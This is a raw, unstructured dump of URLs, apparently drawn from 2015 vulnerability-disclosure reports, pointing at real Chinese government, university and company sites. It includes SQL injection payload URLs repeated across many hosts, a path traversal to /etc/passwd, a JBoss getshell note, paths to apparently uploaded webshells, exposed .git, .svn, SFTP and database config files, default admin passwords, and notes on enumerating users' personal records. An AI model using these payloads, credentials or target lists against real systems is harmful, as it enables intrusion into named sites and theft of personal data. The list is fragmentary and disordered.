http://taocan.ctrip.com/VacationBooking/Order.aspx?TmpOrderid=aLkC8eU0XgfUfmyWfKpCQQ%3d%3d http://taocan.ctrip.com/VacationBooking/Order.aspx?TmpOrderid=hPDszLcP6zYcyXvCG3EwZQ%3d%3d http://61.191.47.115/login 
http://www.wmu.edu.cn/view.php?id=c18e790c-f910-11e4-a3a3-d70b5c2416ab http://rsc.wmu.edu.cn/List.php?BigCategoryId=28 http://rsc.wmu.edu.cn/List.php?BigCategoryId=28&SmallCategoryId=76 http://www.boloni.com.cn/ http://test.qianbo.com.cn/Ch/3D.Asp?ID=13 http://www.juxintrade.com/Ch/3D.Asp?ID=2 http://www.snwh.gov.cn/whjiaodian/gaige30/3d.asp?id=278 http://test.qianbo.com.cn/Ch/3D.Asp?ID=13 http://ffrhy.com/Ch/3D.Asp?ID=6 http://www.caizikeji.com/Ch/3D.Asp?ID=150 http://www.juxintrade.com/Ch/3D.Asp?ID=2 http://chinarrxx.com/Ch/3D.Asp?ID=11 http://www.guandi.com.au/Ch/3D.Asp?ID=13 http://www.snwh.gov.cn/whjiaodian/gaige30/3d.asp?id=278 http://www.hy-expo.com/3d.asp?id=2 http://www.lfled.com/Ch/3D.Asp?ID=11 http://www.luckyled.com/Ch/3D.Asp?ID=13 http://www.kftiangong.com/Ch/3D.Asp?ID=8 http://www.npcxjszp.com/Ch/3D.Asp?ID=127 http://www.orange-landscape.com/orange/cn/3d.asp?Id=51 http://www.carvarcenter.com/3d.asp?id=162&aid=22 https://member.hexindai.com/member/profile/message/noticedetail-noticeid_854461-passportnoticeid_968163.html https://jr.ffan.com/crowdfunding/api/address/set https://github.com/MichaelHu/myscripts/blob/03d8d9b238d6c551fb5f36f9c261b85e81fbb7a4/apache/conf/other/rewrite.conf http://tc-apptest-img08.vm.baidu.com:8055/vs_proxy.php?request_url=http://m.baidu.com/news http://tv.cqeic.cn/BlogManage/Message/Login.aspx?APPSecret= http://tv.cqeic.cn/systemManage/Login.aspx选择系统管理员.输入 http://www.zjj.gov.cn/jscall/adshow.jsp?typecode=-1+OR+17-7%3d10 http://202.105.215.70/crm/ http://202.105.215.70/ccpvcc/ http://api.huagu.com/feedback/?cmd=list&db=mobile&typeid=0&page= http://125.88.6.156/nhzb/中国南方航空采购招标网 http://125.88.6.156/nhbpm/南航贸易业务流程管理系统 http://125.88.6.156/coms/login.jsp http://125.88.6.156/coms_sub/login.jsp http://125.88.6.156/coms_wh/login.jsp http://www.hnewzs.com.cn/Login/NewsList.aspx?KindName=%u515a%u98ce%u5ec9%u653f&KindId=100114&UnitId=100101100 
http://www.hnewzs.com.cn/Login/NewsList.aspx?KindName=%u515a%u98ce%u5ec9%u653f&KindId=100114&UnitId=100101100 http://jk.hnewzs.com.cn/Login/Login.aspx?ReturnUrl=%2fDefault.aspx user:admin pwd:admin http://202.105.215.104/ccpsso/ http://202.105.215.104/ccpsso/Check?Action=checkUser http://202.105.215.104 http://www.chengrui.cc/SiteManager/crkj/index.aspx http://demo.chengrui.cc:7108//RSWeb/View.aspx?ID=1(官方demo) http://www.ningwai.net:8189/RSWeb/View.aspx?ID=1 http://pb.lz2004.com/RSWeb/View.aspx?ID=82 http://www.nbsmzx.com:8083/RSWeb/View.aspx?ID=1 http://www.xdzx.cn:9000/RSWeb/View.aspx?ID=1 http://www.jyzyzz.com:81/RSWeb/View.aspx?ID=1 http://www.tbmmis.com/Login.aspx http://yjsb.gmc.edu.cn/bmzz/index.asp?bmid=13&bmmc=%E5%AD%A6%E4%BD%8D%E5% http://www.haodai.com www.haodai.com https://member.hexindai.com/password/reset.html http://keqz.kyqq.gov.cn/admin/left.htm http://www.xinganwang.com/admin/left.htm http://fl.tq.gov.cn/admin/left.htm http://aldesm.kyqq.gov.cn/admin/left.htm http://xamjrb.kyqq.gov.cn/admin/left.htm http://www.wlhtsqykjxh.com/admin/left.htm http://xinanep.com/admin/left.htm http://njj.kyqq.gov.cn/admin/left.htm http://jlhz.kyqq.gov.cn/admin/left.htm http://blgdx.kyqq.gov.cn/admin/left.htm http://sjj.kyqq.gov.cn/admin/left.htm http://daj.kyqq.gov.cn/admin/left.htm http://jtj.kyqq.gov.cn/admin/left.htm http://www.tqzfcg.com/admin/left.htm http://ghj.kyqq.gov.cn/admin/left.htm http://slz.kyqq.gov.cn//admin/left.htm http://jlhz.kyqq.gov.cn/admin/left.htm http://jsj.kyqq.gov.cn/admin/left.htm http://www.zjcyjgs.com/admin/left.htm http://222.173.107.9:7009/JdjMessage_list.action http://222.173.107.9:7009/JdjVideo_findById.action http://222.173.107.9:7009/JdjZxdcRequestion_saveInverstIgateClicknum.action http://222.173.107.9:7009/JdjSource_findById.action http://121.33.250.49/ http://121.33.250.49/invoker/JMXInvokerServlet,进行getshell URL:http://www.doujiang.com/lifeIndex!index.action 
http://222.41.148.203:8989/tietongyunwei/tietongyunwei-debug/tietongyunwei.html http://www.seeyouyima.com/update_admin/login.php https://member.hexindai.com/password/reset-action_email-sign_8u5ARNqRJTEdmBEZDEw0RRXF3GlxBCFIPAQsDQxoSMwRCFkQMQBZjHEYAfHRBWEEAGh8aKgxeD1h+Ul0EFApBDVQJWAxGB0QRFEkXdQ4DCl0aCRoOBktWW3BCQU9VXw5HHUdkAkERRwpEEWZEAhYWQhoJGldBFURmQlxWCFpVKiETXxZSBlUPXQFHGRIxBwJddlJVA0EDRGpFClFXVWwWU1JWDD9HVQJUUEcZEi4NAVhUVnYTDlsDRBIJElAFBVFUA1YFVwVaFUkULEZmBhAKV1FWXCQafAtXWV8SWxQBQUkTLEc1VxBeA18AUXIaLwxTUV9dKBZUBFNCEQpDBxJPR2IAWgdmC1oAFF8EBFBTVQMKAw5eHg==.html http://oa.bjgold.com.cn/login/Login.jsp?logintype=1 url:http://oa.bjgold.com.cn/tools/SWFUpload/upload.jsp http://www.letao.com http://www.donews.com/donews.sql http://wooyun.org/bugs/wooyun-2015-0113682川师大的修复方案是前台页面不告诉你默认密码123456了。 http://zjc.sicnu.edu.cn/ http://202.115.192.98/ http://202.115.200.140:8082/ http://lx.sicnu.edu.cn http://m.chinahr.com/sftp-config.json http://mt.chinahr.com/sftp-config.json www.fcgbw.com/oa/admin1121 http://circle.51yund.com/tree/donateTop?top_type=city&is_share=true&order_type=distance&province=江苏省 http://sqlmap.org http://ip:6677/command?param1=value1&...¶mn=valuen http://ip:6677/getpackageinfo?packagename=xxx时(xxx为软件包名)可返回手机上安装的xxx所指定的任意软件包版本信息。值得注意的是,若xxx为android,可返回android系统版本信息; http://ip:6677/androidamap?action=yyy¶m2=value2&...¶mn=valuen时,AMapService将设置一intent对象,其action为com.autonavi.minimap.Intent.Action,extra为{“method”:"androidamap","action","yyy","params","¶m2=value2&...¶mn=valuen"},然后将其广播出去。搜索com.autonavi.minimap.Intent.Action,可发现AmapActionBroadcastReceiver对其进行处理。见com.autonavi.map.intent.AmapActionBroadcastReceiver中的onReceive方法 androidamap://yyy?sourceApplication=web¶m2=value2&...¶mn=valuen,并以隐式intent的形式启动注册这种uri http://ip:6677/androidamap?action=yyy¶m2=value2&...¶mn=valuen,启动目标ip中的com.autonavi.map.activity.NewMapActivity执行命令,其中yyy为上述data http://ip:6677/geolocation http://ip:6677/getpackageinfo?packagename=xxx,其中xxx为软件包名 
http://ip:6677/androidamap?action=showTraffice http://ip:6677/androidamap?action=viewMap http://ip:6677/androidamap?action=indoorMap http://ip:6677/androidamap?action=myLocation http://ip:6677/androidamap?action=viewMap http://ip:6677/androidamap?action=bus http://ip:6677/androidamap?action=arroundpoi http://ip:6677/androidamap?action=route http://ip:6677/androidamap?action=keywordNavi http://ip:6677/androidamap?action=viewReGeo http://ip:6677/androidamap?action=viewPOIDetail http://ip:6677/androidamap?action=shortUrl http://ip:6677/androidamap?action=discovery http://ip:6677/androidamap?action=hotelList http://ip:6677/androidamap?action=groupbuyList http://ip:6677/androidamap?action=navi2SpecialDest http://ip:6677/androidamap?action=rootmap http://ip:6677/androidamap?action=openmap http://ip:6677/androidamap?action=openTrafficRemind http://ip:6677/androidamap?action=multiPointShow http://ip:6677/androidamap?action=navi http://ip:6677/androidamap?action=nonexist http://ip:6677/androidamap?action=openFeature的情况,这种情况对安全影响最大,是真正的远程命令执行漏洞。 https://s.bt.gg/#q=%E7%A0%94%E5%8F%91%E4%B8%8E%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%AD%A6%E6%B1%89%E5%BC%98%E6%99%BA%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&newwindow=1&start=0 http://www.thfdc.gov.cn/Web_Site/ywzx.aspx?lmid=202 http://www.xgfdc.com.cn/Web_Site/ywzx.aspx?lmid=202 http://www.hsxfdc.com/Web_Site/ywzx.aspx?lmid=202 http://www.ljfc.gov.cn/Web_Site/ywzx.aspx?lmid=202 http://www.yxfgs.net/Web_Site/ywzx.aspx?lmid=202 http://www.hhsfcglj.com/Web_Site/ywzx.aspx?lmid=202 http://4a.51awifi.com/4a/index.htm http://www.thfund.com.cn/zlbpro/zlbPage/index_page_3.action;JSESSIONID1=TvqZJ2lJRF7pGvjFSMfTnJ2QWdj5v4vc8d6MCt48cgy4pg3jRGQn!1971221988?actionName=thottopicsAction_list http://blog.39.net/askU36CA/pic_462786.html http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://s1.ygimg.cn/template/common/js/jquery-1.4.2.min.js?3.1.0 
http://s2.ygimg.cn/template/common/css/base-2.css?3.1.0 http://s2.ygimg.cn/js/common/validate/css/validator.css?3.1.0 http://s1.ygimg.cn/template/common/css/new_log_reg.css?3.1.0 http://s2.ygimg.cn/template/common/js/yg.common.js?3.1.0 http://s1.ygimg.cn/template/common/js/yg.member.js?3.1.0 http://s1.ygimg.cn/js/yitianmall/usercenter/findpwd.js?3.1.0 http://www.yougou.com/#ref=all&po=logo_yougou http://www.yougou.com/topics/mobile.html http://itunes.apple.com/cn/app/zhang-shang-you-gou/id504493912?mt=8 http://mobile.yougou.com/appVersion/package.sc?channelCode=YgYougouwebA59 border-right:none https://vpn.sasac.gov.cn/ http://hybrid.baidu.com/.git/config http://www.17ugo.com/ https://raw.githubusercontent.com/THOK-SW/wms_rfid/master/doc/%E5%B9%BF%E8%A5%BF%E5%90%84%E5%9C%B0%E5%B8%82%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C%E5%AF%86%E7%A0%81%20.doc http://111.44.243.31/qhlp/js/safeCenter/selectEmail.action?account=123 http://loginserver.ourgame.com/login/login.rar http://www.niuhuhu.com/hotel/price?checkin=2015-5-13&checkout=2015-5-14&hotelid=* http://www.niuhuhu.com/hotel/price?checkin=2015-5-13&checkout=2015-5-14&hotelid=1 www.wenanji.com会跳转到流米主站http://www.iliumi.com/ http://www.tzgh.gov.cn/dynamic/WebInformation/message_list.php?CategoryID=1 http://qfoa.qfkd.com.cn/setqfkd/login.aspx http://www.ncstdc.org/www.rar www.17ugo.com http://www.17ugo.com http://www.hexindai.com/log.txt http://www.cwan.com/include/w.php www.cwan.com/plus/diy.php www.cwan.com/plus/count.php http://www.massjj.gov.cn/searchnews.aspx?s=1 http://circle.51yund.com/ http://mail.qufenqi.com/ ftp://58.213.46.198/ http://ilife.homelink.com.cn/aigou/?c=index&a=orderbuy&id=106714 http://113.108.91.188/zabbix/ http://113.108.91.188/cacti/ http://113.108.91.188/nagios/ www.kuparts.com)是国内首家集汽车配件、汽车用品、汽车服务于一体的电子商务平台,以B2B2C+O2O的商业模式开创了汽车后市场全新的电商格局,致力于成为中国汽车后市场全产业链在线交易服务第一平台。 http://113.108.91.188/zabbix/ http://www.ztesoft.com:808/ www.ztesoft.com:808 ftp://58.213.115.119/ 
http://www.shenzhenpost.com.cn:81/jsp/login.jsp ftp://58.213.46.194/ http://mall.51yund.com/exchange/orderAddress?order_id=1&product_id=5&circle_id=&user_id=10000 http://mall.51yund.com/exchange/orderAddress?order_id=1&product_id=5&circle_iduser_id=1244685 http://edu.csdn.net/combo?t=GPU%E6%B8%B2%E6%9F%93 http://dspcdc.ee.stust.edu.tw http://cms.csdb.cn/cms4jadmin/login.jsp http://feedback.hao.360.cn/ http://down.chinaz.com/soft/24224.htm http://admin.fadongxi.com/ http://brandbase.mama.cn/yikexin.php?ctype=*&mod=growth&op=detail&pgcount=12&tid=1520677 URL:http://www.mama.cn:80/photo/index.php?a=Search&d=index&g=Search&gotosearch=yes&keyword=*&num=25&page=1&searchtype=photo http://client.weimai.com/weimai/s/user/getshopinfo.json?id=1&callback=json http://222.92.49.180:8080/UserLogin.aspx http://service.faw-mazda.com/Spareparts/index.php/beipinzixun/broadscast?id=758 http://wss.csair.com/WEB-INF/classes/hibernate.cfg.xml jdbc:oracle:thin:@10.103.118.61:1521:ECS http://car2share.daihing.com/ http://car2share.daihing.com/daimler-main/help/forgetPwd.shtml http:/car2share.daihing.com/daimler-main/help/forgetPwd3.shtml http://blog.99.com/admin.php,管理后台存在弱口令admin/admin http://w.k189.cn/Log/ http://ehr.qfkd.com.cn:8080/template/search_template?module=-1&type=10*&res_flag=31 http://ehr.qfkd.com.cn:8080//template/searc http://ehr.qfkd.com.cn:8080//template/searc http://221.226.82.226:8088/njqxjweb/homepages/comp_query_page.aspx http://www.cofcoyoucai.com/user/userInfo.html http://www.j1.com/ http://www.hx.gov.cn/wap/ljhx/list.php?pid=387 http://www.wjxrd.gov.cn/ztbd/list.php?pid=2228&ty=223 http://www.pgzhibo.com/list.php?pid=6 http://www.hx.gov.cn/wap/ljhx/list.php?pid=387 http://www.wjxrd.gov.cn/ztbd/list.php?pid=2228&ty=223 http://www.pgzhibo.com/list.php?pid=6 http://scication.swu.edu.cn/list.php?pid=197 http://www.xinganx.com/list.php?pid=4 http://www.fiberglasschina.com/list.php?pid=4 http://www.99jiaocheng.com/list.php?pid=31&info=pre_hcinfo 
http://www.wjxrd.gov.cn/ztbd/list.php?pid=2228&ty=223 http://www.fengfan.com.cn/wap/list.php?pid=211&id=409 http://www.sinorda.com/List.php?pid=0&cid=15&id=30 http://bmcb.shsmu.edu.cn/shsmu/List.php?pid=0&cid=3 http://wsxf.shouxian.gov.cn/email_pub.asp?DepartNo=001000000 http://wsxf.shouxian.gov.cn/view_mail.asp?xfsxbh=201400000096&DepartNo=001000000 http://wsxf.shouxian.gov.cn/view_mail.asp?xfsxbh=201400000096&DepartNo=001000000 http://xf.suifenhe.gov.cn/view_mail.asp?xfsxbh=201400000074&DepartNo=001000000 http://www.ybqxf.gov.cn/view_mail.asp?xfsxbh=201400000015&DepartNo=001000000 http://221.206.154.214/view_mail.asp?xfsxbh=201100000397&DepartNo=001000000 http://wsxf.shouxian.gov.cn/email_pub.asp?DepartNo=001000000 http://wsxf.shouxian.gov.cn/email_index.asp?DepartNo=001000000 http://221.237.222.20/introduction.asp?DepartNo=001000000000 http://www.ybqxf.gov.cn/email_pub.asp?DepartNo=001000000 http://xf.suifenhe.gov.cn/email_pub.asp?Page=3&DepartNo=001000000 https://s.bt.gg/#q=%E7%A0%94%E5%8F%91%E4%B8%8E%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%AD%A6%E6%B1%89%E5%BC%98%E6%99%BA%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&newwindow=1&start=0 http://www.thfdc.gov.cn/Web_Site/jzxx.aspx?lmid=200 http://www.thfdc.gov.cn/Web_Site/zxdy.aspx?lmid=203 http://www.xgfdc.com.cn/Web_Site/jzxx.aspx?lmid=200 http://www.xgfdc.com.cn/Web_Site/zxdy.aspx?lmid=203 http://www.hsxfdc.com/Web_Site/jzxx.aspx?lmid=200 http://www.hsxfdc.com/Web_Site/zxdy.aspx?lmid=203 http://www.ljfc.gov.cn/Web_Site/jzxx.aspx?lmid=200 http://www.ljfc.gov.cn/Web_Site/zxdy.aspx?lmid=203 http://www.yxfgs.net/Web_Site/jzxx.aspx?lmid=200 http://www.yxfgs.net/Web_Site/zxdy.aspx?lmid=203 http://www.hhsfcglj.com/Web_Site/jzxx.aspx?lmid=200 http://www.hhsfcglj.com/Web_Site/zxdy.aspx?lmid=203 http://www.gd-linux.org/ajax.do?act=getinfo&oper=ProductAction http://m.mogujie.com/x4 http://mbcf.dfci.harvard.edu/phpMyAdmin http://219.143.15.9/login.jsp http://192.168.6.1:8000/index.htm 
http://192.168.8.1/login.html# http://chandra.harvard.edu/blog/files/images/20150329173150-90127.php http://hanyu.iciba.com/wiki/采用HDWiki,而这套系统存在注入。 hanyu.iciba.com/wiki/index.php?edition-compare-1 http://61.178.81.162:8888/LQL_OA/login.aspx http://car2sharew.daihing.com https://github.com/tecshuttle/fishbone/blob/master/application/config/development/config.php http://zdcg.517na.com/ http://th.517na.com/ http://gj.517na.com/ http://car2sharew.daihing.com/admin http://218.244.141.71/authorize/Login.jsp http://yjsyx.zstu.edu.cn/yxxt/web/zzfw_index.do存在 http://my.anjuke.com/login http://my.anjuke.com/usercenter/login https://cas.hbmy.edu.cn/securitycenter/pass!find.action?mode=mibao https://www.hongkongair.net/recruitment/recPositionShowAction!searchRecShowPosition.action?_t_=1324602803257 http://jiudian.suning.com/hotelpay-web/myHotelOrder/showHotelOrderDetail.htm?hotelOrderId=15xxx http://wooyun.org/bugs/wooyun-2015-0114420/trace/21bc63751b03b6f24d0682f5f73986ba http://www.jobhb.com/person/personinfo_modi.asp?action=1&rid=3496修改这个连接后面的数字可以遍历所有用户资料包括身份证,邮箱,姓名,出生日期,电话,通讯地址。 http://ltx.cncnc.edu.cn http://58.248.56.70 http://my.xcar.com.cn/set/mobile.php?h=4 http://oa.yaochufa.com/ http://lb.pptv.com/user/login这个接口,没有登录的限制,然后直接可以抓包之后开始设置变量撞库 http://next.36kr.com:9200/ http://dfi.bnuz.edu.cn/graduate.php?newsid=9 http://dfi.bnuz.edu.cn/news.php?newsid=1384 http://dfi.bnuz.edu.cn/news.php?newsid=1397 https://github.com/cheerzhang/pythontest/blob/12fe66150986b9fdfd47ac47f1975fff743cfa2a/sendmail.py http://cacti.bokecc.com//cache/2.php http://h5.cmge.com/downloadCount!service?foldName=12209_zhensanguokuaida&name=../../../../../../../../../../etc/passwd&objId=12209 http://www.lashou.com/account/ResetReq/step1/ http://dm.10086.cn/w/p.zip http://dm.10086.cn/auth/login?needLogin=false&display=html&service=http%3A%2F%2Fwww.baidu.com%2F%3F1431731253.37 http://dm.10086.cn/w/lv?f=2653&vt=4&pg=524&tgu=http%3A%2F%2Fwww.baidu.com%2F%3F1431731996.83 http://123.172.126.20:8080/ 
http://202.70.26.137:8080/ http://222.161.211.132:8080/ http://203.86.10.137:8080/ http://119.255.19.71:8080/ http://202.70.26.137:8080 http://gc.51.com http://s3.xrxsg.51.com https://member.feiniu.com/getaway/login http://rjt.czlib.net:8010/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://202.112.200.137/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://202.195.60.180/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://sy2.hbdlib.cn/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://120.196.134.134/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://218.195.112.46/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://202.118.72.9/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://202.121.241.131/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://www.ay110.com.cn/admin/ http://www.nbhrss.gov.cn/ http://shbxwsb.nbhrss.gov.cn:8080/sionline/commpages/comm/orisource.jsp?opseno=246412120# http://ecases.medlive.cn/list-zhuanqu-132.html?issearch=1&searchkey=title&searchcontent=11 http://app.jshrss.gov.cn/,这里可以下载到江苏人社的移动端的App。 http://app.jshrss.gov.cn:81/testjk/jsrs/complainlist.jsp?user_id=0000117304&id=&submit_data=&page_size=100&start_page=1&tsjblx=3,修改user_id参数,可以获取其投诉的流水号。截图如下: http://app.jshrss.gov.cn:81/testjk/jsrs/complaindetail.jsp?id=32000015051567798,可以发现举报的具体内容,截图如下: http://job.zte.com.cn/ http://job.zte.com.cn/SocietyRecruitFront/PositionManage/PositionDetail.aspx?jobid=Z2015034680 https://ept.bot.com.tw/BOT01Web/showNews.jsp?posterId=20511 http://i.wo.cn/wooyun.txt inurl:file_post/display/topic.php?TopicCode=12 http://luhe.gdrtvu.edu.cn/file_post/display/topic.php?TopicCode=12 http://bjcenter.crtvu.cn/file_post/display/topic.php?TopicCode=12&CourseID=0 http://www.wdtvu.com/file_post/display/topic.php?TopicCode=12 http://www.gzrtvu.com/file_post/display/topic.php?TopicCode=12 http://ddzx.bbtvu.ah.cn/file_post/display/topic.php?TopicCode=12 
http://hsdd.hstvu.com.cn/file_post/display/topic.php?TopicCode=12 http://www.meitun.com/ http://www.quwan.com/user.php?act=address_list http://**.**.**/riskIndex.jsp_ http://www.pdnotary.com/xianshi.aspx?ID=14&biaoti=%E9%80%9A%E5%91%8A%E5%85%AC%E7%9F%A5&biao=announcement http://h5.kaiyuanhotels.com/m/login/toLogin.htm www.cq.cyberpolice.cn/Manager/login.aspx www.cq.cyberpolice.cn/WebResource.axdd=uetl-P2hU7LIm_ inurl:http://www.ceaftc.com/Internal/wpapi/trainee_showpage.jsp?TRAINEEID= http://www.ceaftc.com/Internal/wpapi/trainee_showpage.jsp?traineeid=201515082A1 http://www.ceaftc.com/Internal/wpapi/trainee_showpage.jsp?TRAINEEID=20106520A1 http://www.wooyun.org/bugs/wooyun-2015-0114613/trace/6b8512373b7ad2c2608ecf89f0a9b4ce http://ecasesp.medlive.cn/ac-usercenter/register.html inurl:http://manager.xhd.cn/view/orderviewfindbyorderno.action?order.orderNo http://manager.xhd.cn/view/orderviewfindbyorderno.action?order.orderNo=BJ-127185821&depCode=beijing http://manager.xhd.cn/view/orderviewfindbyorderno.action?order.orderNo=BJ2119545089&depCode=beijing http://www.peng-xin.com.cn/dichan/home2-dt.asp?id=4 http://passport.feng.com/index.php?r=pwd/forgetPassword http://auth.seeyouyima.com/login http://auth.seeyouyima.com/login/change_password http://auth.seeyouyima.com/login http://rjt.czlib.net:8010/Softwarer/ThirdLevel/mediabook.asp?code=my_8.5_ch http://202.112.200.137/Softwarer/ThirdLevel/mediabook.asp?code=my_8.5_ch http://sy2.hbdlib.cn/Softwarer/ThirdLevel/mediabook.asp?code=my_8.5_ch http://120.196.134.134/Softwarer/ThirdLevel/mediabook.asp?code=my_8.5_ch http://218.195.112.46/Softwarer/ThirdLevel/mediabook.asp?code=my_8.5_ch http://202.118.72.9/Softwarer/ThirdLevel/mediabook.asp?code=my_8.5_ch http://rjt.czlib.net:8010/Softwarer/ThirdLevel/mediasubject.asp?code=cad090714_2008_ch http://202.118.72.9/Softwarer/ThirdLevel/mediasubject.asp?code=cad090714_2008_ch http://202.121.241.131/Softwarer/ThirdLevel/mediasubject.asp?code=cad090714_2008_ch 
http://120.196.134.134/Softwarer/ThirdLevel/mediasubject.asp?code=cad090714_2008_ch http://202.112.200.137/Softwarer/ThirdLevel/mediasubject.asp?code=cad090714_2008_ch http://www.qy.com.cn/getpwd.html http://220.191.221.74/index!index.action http://www.12308.com http://cms.qingting.fm/ http://115.29.168.119/phpsso_server/uploadfile/avatar/1/1/1/3333/22.php http://183.232.11.212/jeewx/ http://183.232.11.212/jeewx/upload/files/20150517203533dKJuKaM1.jsp http://rmp.haier.net/data/ http://rmp.haier.net/kindeditor/ http://rmp.haier.net/backup/ http://rmp.haier.net/uploads/ http://rmp.haier.net/admin/ http://learning.haier.net/a.jsp http://58.213.145.69:8088/IPSysSIPO/Manager/Login.aspx http://choujiang.haier.net/upload/ http://choujiang.haier.net/images/ https://github.com/weizhongpeng/dqm/blob/699d41be5e39ca901020f1f90f215c0cb70d0ecc/WebContent/WEB-INF/classes/environment.properties http://my.ctrip.com http://pass.enet.com.cn/reset_ps.jsp http://cpm.youku.com/monitor/nilsen_si.jsp site:babytree-inc.com hr.babytree-inc.com/security/home.html hr.babytree-inc.com/security/login.html hr.babytree-inc.com/security/console.html http://home.babytree-inc.com/.git/config http://rtx.babytree-inc.com:8012/ http://rtx.babytree-inc.com:8012/check.php http://rtx.babytree-inc.com:8012/admin.php http://hlpx.qiluhospital.com:8000/login.jsp http://www.wooyun.org/bugs/wooyun-2015-0114613/trace/6b8512373b7ad2c2608ecf89f0a9b4ce http://www.wooyun.org/bugs/wooyun-2015-0114653/trace/c63ecd40a4d08d97335af3b72880a96f http://my.mbaobao.com/member/profile/address http://121.13.248.36/ http://gtresearch.gtfund.com/ http://gtresearch.gtfund.com:8280/myname/test1.jsp http://ir.firstholding.com.tw/c/event_release_o.php?id=4606 http://www.oneniceapp.com/ http://222.76.126.101/ http://www.wanxinsoft.com/ http://202.114.33.72/model/TwoGradePage/TrainSignUp1.aspx?tblApparatusRepertoryListID=44807 http://210.43.24.201:8080/model/TwoGradePage/TrainSignUp1.aspx?tblApparatusRepertoryListID=44807 
http://210.27.176.162/model/TwoGradePage/TrainSignUp1.aspx?tblApparatusRepertoryListID=44807 http://210.40.162.138:8000/model/TwoGradePage/TrainSignUp1.aspx?tblApparatusRepertoryListID=44807 http://yqgx.zstu.edu.cn/model/TwoGradePage/TrainSignUp1.aspx?tblApparatusRepertoryListID=44807 http://dxsb.qfnu.edu.cn/model/TwoGradePage/TrainSignUp1.aspx?tblApparatusRepertoryListID=44807 http://183.136.198.245/credit/plat/forget.action site:wap.koudaitong.com/v2/trade/order http://health.gj.qq.com:8080/jmx-console/ http://sz.js.qq.com/ http://sz.js.qq.com/Admin/Index http://redpocket.vvipone.com/campaign/dianrong/dianRongLogin.html http://redpocket.vvipone.com http://www.renren.com/bind/baidu/rb http://gps4.56pip.com/index.aspx# URL:http://passportstdby.pptv.com/v3/login/login.do GET:format=jsonp&from=undefined&cb=jQuery183044330982165411115_1431927168727&username=******@qq%2ecom&password=******&CheckboxSaveInfo=on&_=1431927177720 http://www.nongyou.com.cn/ http://60.217.72.17:8000/FreeTextBox/Editor/ftb.imagegallery.aspx http://61.133.119.187:8089//FreeTextBox/Editor/ftb.imagegallery.aspx http://222.135.109.70:8100//FreeTextBox/Editor/ftb.imagegallery.aspx http://222.135.76.147:8100//FreeTextBox/Editor/ftb.imagegallery.aspx http://221.2.171.59:8000//FreeTextBox/Editor/ftb.imagegallery.aspx http://221.2.156.181:8100//FreeTextBox/Editor/ftb.imagegallery.aspx http://youhuiquan.55bbs.com/consume.php?keyword=1 http://202.111.175.199/system/login.php http://202.111.175.199:8888/login.php http://202.111.175.199:8000/ http://idarun.com Usernaem:admin Password:a123456 www.hktv.tv www.cgv.com.cn有完全一样的漏洞!!!! 
http://www.cgv.com.cn/activity/activity!getHistoryByAjax.dhtml?pageNum=1&_cityId=ALL&_cinemaId=ALL&_month=2015-03&_=1431747638486 http://www.cgv.com.cn/activity/activity!getRewardsByAjaxPage.dhtml?_cityId=489&_cinemaId=50&_pageNum=1&_=1431931980427 http://www.cgv.com.cn/activity/activity!getCouponsByAjaxPage.dhtml?_cityId=489&_cinemaId=50&_pageNum=1&_=1431932071850 http://www.cgv.com.cn/.svn/entries www.cgv.com.cn/WEB-INF/web.xml http://www.zbird.com/auth/login/redirecto/L29yZGVyL2luZGV4/ http://v8.workyi.com/ http://v8.workyi.com/hunter/posts.aspx?key= version:2.5.130916 http://v8.workyi.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://www.tjkyhr.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://beijing.ahyylw.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://www.liuzhoujob.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://www.yiwork.net/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://test.fashiondigital.net/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://1317hr.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://gz.baoxianren.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://t.baoxianren.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://www.edu025.net/) inurl:/webSchool/read.aspx?ID= http://hxxx.zajyj.cn/webManage/default.aspx?classID= http://za6z.zajyj.cn/webManage/default.aspx?classID= http://spxx.zajyj.cn/webManage/default.aspx?classID= http://mtxx.zajyj.cn/webManage/default.aspx?classID= http://jzzx.zajyj.cn/webManage/default.aspx?classID= http://zyzx.zajyj.cn/webManage/default.aspx?classID= http://ljzx.zajyj.cn/webManage/default.aspx?classID= http://yanxi.zajyj.cn/webManage/default.aspx?classID= http://rxzx.zajyj.cn/webManage/default.aspx?classID= http://glzx.zajyj.cn/webManage/default.aspx?classID= http://mail.yn.gov.cn/ http://yun.lu http://bjtu.yun.lu/user/sendChgPwdEmail 
